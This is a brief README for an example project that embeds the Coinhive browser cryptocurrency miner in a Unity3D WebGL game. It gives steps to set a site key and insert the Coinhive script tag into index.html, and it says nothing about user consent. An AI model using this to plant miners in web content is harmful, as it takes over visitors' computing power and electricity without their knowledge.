### INFO ###

It is example of using coin-hive.com miner in unity3d WebGL build


### Steps ###

1) create account on coin-hive.com and get site key

2) download example

3) change "Key" in Logic.cs

4) make WebGL build

5) insert <script> in index.html file

//<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

6) Profit!!